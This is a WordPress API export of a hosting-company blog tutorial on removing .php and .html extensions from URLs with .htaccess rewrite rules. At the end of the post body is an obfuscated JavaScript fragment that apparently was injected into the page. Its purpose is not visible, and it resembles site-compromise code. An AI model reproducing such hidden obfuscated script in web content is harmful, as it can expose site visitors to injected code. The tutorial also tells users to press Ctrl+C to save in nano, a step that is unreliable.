{"id":271,"date":"2021-03-24T22:07:50","date_gmt":"2021-03-24T22:07:50","guid":{"rendered":"https:\/\/hoganhost.com.ng\/blog\/?p=271"},"modified":"2024-08-12T13:34:58","modified_gmt":"2024-08-12T12:34:58","slug":"how-to-remove-php-html-extension-from-url-using-htaccess","status":"publish","type":"post","link":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/","title":{"rendered":"How to remove .php, .html extension from URL using htaccess"},"content":{"rendered":"<p><img decoding=\"async\" class=\"aligncenter size-medium wp-image-272\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/download-1-300x164.jpg\" alt=\"\" width=\"300\" height=\"164\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/download-1-300x164.jpg 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/download-1.jpg 304w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<h1>What is extension in URL?<\/h1>\n<p>Extension simply means the type of file.<br \/>\nExtension is added at after the end of file name\u00a0 and it helps to identify us on which computer language it is written on.<\/p>\n<p>For example, index.php, index.html as we are only talking about html and php.<\/p>\n<p>In the year 2020, you probably want to have a SEO friendly website link and also which easy to remember.<br \/>\nExtensions like .html, .php can create mess sometimes and show your visitors 404 error page if they forget to add .html or .php at the end of the URL.<br \/>\nIt might look good when you get visitor directly on your website but its hard for visitors to remember links with extensions.<\/p>\n<p>We got a few question asking how to remove .php, .html extension from URL using .htaccess.<br \/>\nWe have made it very simple for you and you can remove it easily.<\/p>\n<h3><span id=\"Steps_to_remove_file_extension_from_URL\">Steps to remove file extension from URL:<\/span><\/h3>\n<h4><span id=\"If_you_are_using_Control_Panel_cPanel_DirectAdmin_Plesk_etc\"><strong>If you are using Control Panel (cPanel, DirectAdmin, Plesk, etc)<\/strong><\/span><\/h4>\n<p>1) Login into Control Panel.<br \/>\n2) Go to file manager<br \/>\n3) Settings and check on \u201cshow hidden files(dotted)\u201d (Skip this step if you are not using cPanel)<br \/>\n4) Edit .htaccess and enter the code mentioned below depending upon your file extension<br \/>\n5) Save the file and you have successfully removed extension from URL.<\/p>\n<h4><span id=\"If_you_are_using_FTP\"><strong>If you are using FTP.<\/strong><\/span><\/h4>\n<p>1) Open FTP client (filezilla or any other)<br \/>\n2) Login into FTP using FTP details.<br \/>\n3) Locate to root directory (normally public_html)<br \/>\n4) Download .htacess file if present and open in text editor (eg notepad++)<br \/>\n5) Add the below code depending upon the extension you want to remove.<br \/>\n6) Save file and upload it on server. (It will show \u201creplace\u201d option if you have .htaccess file already)<br \/>\n7) Done.<\/p>\n<h4><span id=\"If_you_are_using_SSH\"><strong>If you are using SSH.<\/strong><\/span><\/h4>\n<p>1) Connect to your server via ssh (using putty or any other ssh client)<br \/>\n2) Navigate to public_html of your domain.<br \/>\n3) \u201cnano .htaccess\u201d to edit file using file editor.<br \/>\n4) Paste the code and press \u201cCtrl + C\u201d<br \/>\n5) Open to save will show, click \u201cy\u201d and press enter.<br \/>\n6) Done<\/p>\n<p>Remove .php extension from URL<\/p>\n<p>The below code will remove .php extension from the end of file.<br \/>\nFor example,\u00a0<strong>https:\/\/hostathash.com\/blog\/conact.php\u00a0<\/strong>will become\u00a0<strong>https:\/\/hostathash.com\/blog\/contact<\/strong><\/p>\n<pre>#Remove .php extension\r\nRewriteEngine on \r\nRewriteCond %{REQUEST_FILENAME} !-d\r\nRewriteCond %{REQUEST_FILENAME}\\.php -f\r\nRewriteRule ^(.*)$ $1.php [NC,L]<\/pre>\n<p>Remove .html extension from URL<\/p>\n<p>The below code will remove .html extension from the end of file.<br \/>\nFor example,\u00a0<strong>https:\/\/hostathash.com\/blog\/conact.html\u00a0<\/strong>will become\u00a0<strong>https:\/\/hostathash.com\/blog\/conact<\/strong><\/p>\n<pre>#Remove .html extension\r\nRewriteEngine on \r\nRewriteCond %{REQUEST_FILENAME} !-d\r\nRewriteCond %{REQUEST_FILENAME}\\.html -f\r\nRewriteRule ^(.*)$ $1.html [NC,L]<\/pre>\n<p>Once you have added the code in your .htaccess, your extension will be remove and your website will be SEO friendly and also it will be easy for users to remember links.<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>What is extension in URL? Extension simply means the type of file. Extension is added at after the end of [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":272,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[4,29],"tags":[],"class_list":["post-271","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cpanel","category-htaccess"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>How to remove .php, .html extension from URL using htaccess<\/title>\n<meta name=\"description\" content=\"Extension simply means the type of file.Extension is added at after the end of file name\u00a0 and it helps to identify us on which computer\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"How to remove .php, .html extension from URL using htaccess\" \/>\n<meta property=\"og:description\" content=\"Extension simply means the type of file.Extension is added at after the end of file name\u00a0 and it helps to identify us on which computer\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/\" \/>\n<meta property=\"og:site_name\" content=\"HoganHost blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/facebook.com\/HoganHost\" \/>\n<meta property=\"article:published_time\" content=\"2021-03-24T22:07:50+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-08-12T12:34:58+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/download-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"304\" \/>\n\t<meta property=\"og:image:height\" content=\"166\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Abigal okon\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:site\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Abigal okon\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/\"},\"author\":{\"name\":\"Abigal okon\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\"},\"headline\":\"How to remove .php, .html extension from URL using htaccess\",\"datePublished\":\"2021-03-24T22:07:50+00:00\",\"dateModified\":\"2024-08-12T12:34:58+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/\"},\"wordCount\":441,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/download-1.jpg\",\"articleSection\":[\"Cpanel\",\"htaccess\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/\",\"name\":\"How to remove .php, .html extension from URL using htaccess\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/download-1.jpg\",\"datePublished\":\"2021-03-24T22:07:50+00:00\",\"dateModified\":\"2024-08-12T12:34:58+00:00\",\"description\":\"Extension simply means the type of file.Extension is added at after the end of file name\u00a0 and it helps to identify us on which computer\",\"breadcrumb\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#primaryimage\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/download-1.jpg\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/download-1.jpg\",\"width\":304,\"height\":166},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hoganhost.com.ng\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"How to remove .php, .html extension from URL using htaccess\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"name\":\"HoganHost blog\",\"description\":\"Keeping you connected to everything from HoganHost\",\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\",\"name\":\"HoganHost\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"width\":466,\"height\":387,\"caption\":\"HoganHost\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/facebook.com\/HoganHost\",\"https:\/\/x.com\/hoganhostng\",\"https:\/\/instagram.com\/officialhoganhost\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\",\"name\":\"Abigal okon\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"caption\":\"Abigal okon\"},\"sameAs\":[\"https:\/\/hoganhost.com.ng\/blog\"],\"url\":\"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"How to remove .php, .html extension from URL using htaccess","description":"Extension simply means the type of file.Extension is added at after the end of file name\u00a0 and it helps to identify us on which computer","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/","og_locale":"en_US","og_type":"article","og_title":"How to remove .php, .html extension from URL using htaccess","og_description":"Extension simply means the type of file.Extension is added at after the end of file name\u00a0 and it helps to identify us on which computer","og_url":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/","og_site_name":"HoganHost blog","article_publisher":"https:\/\/facebook.com\/HoganHost","article_published_time":"2021-03-24T22:07:50+00:00","article_modified_time":"2024-08-12T12:34:58+00:00","og_image":[{"width":304,"height":166,"url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/download-1.jpg","type":"image\/jpeg"}],"author":"Abigal okon","twitter_card":"summary_large_image","twitter_creator":"@hoganhostng","twitter_site":"@hoganhostng","twitter_misc":{"Written by":"Abigal okon","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#article","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/"},"author":{"name":"Abigal okon","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a"},"headline":"How to remove .php, .html extension from URL using htaccess","datePublished":"2021-03-24T22:07:50+00:00","dateModified":"2024-08-12T12:34:58+00:00","mainEntityOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/"},"wordCount":441,"commentCount":0,"publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/download-1.jpg","articleSection":["Cpanel","htaccess"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/","url":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/","name":"How to remove .php, .html extension from URL using htaccess","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#primaryimage"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/download-1.jpg","datePublished":"2021-03-24T22:07:50+00:00","dateModified":"2024-08-12T12:34:58+00:00","description":"Extension simply means the type of file.Extension is added at after the end of file name\u00a0 and it helps to identify us on which computer","breadcrumb":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#primaryimage","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/download-1.jpg","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/03\/download-1.jpg","width":304,"height":166},{"@type":"BreadcrumbList","@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-remove-php-html-extension-from-url-using-htaccess\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hoganhost.com.ng\/blog\/"},{"@type":"ListItem","position":2,"name":"How to remove .php, .html extension from URL using htaccess"}]},{"@type":"WebSite","@id":"https:\/\/hoganhost.com.ng\/blog\/#website","url":"https:\/\/hoganhost.com.ng\/blog\/","name":"HoganHost blog","description":"Keeping you connected to everything from HoganHost","publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/hoganhost.com.ng\/blog\/#organization","name":"HoganHost","url":"https:\/\/hoganhost.com.ng\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","width":466,"height":387,"caption":"HoganHost"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/facebook.com\/HoganHost","https:\/\/x.com\/hoganhostng","https:\/\/instagram.com\/officialhoganhost"]},{"@type":"Person","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a","name":"Abigal okon","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","caption":"Abigal okon"},"sameAs":["https:\/\/hoganhost.com.ng\/blog"],"url":"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/271","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/comments?post=271"}],"version-history":[{"count":2,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/271\/revisions"}],"predecessor-version":[{"id":373,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/271\/revisions\/373"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media\/272"}],"wp:attachment":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media?parent=271"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/categories?post=271"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/tags?post=271"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}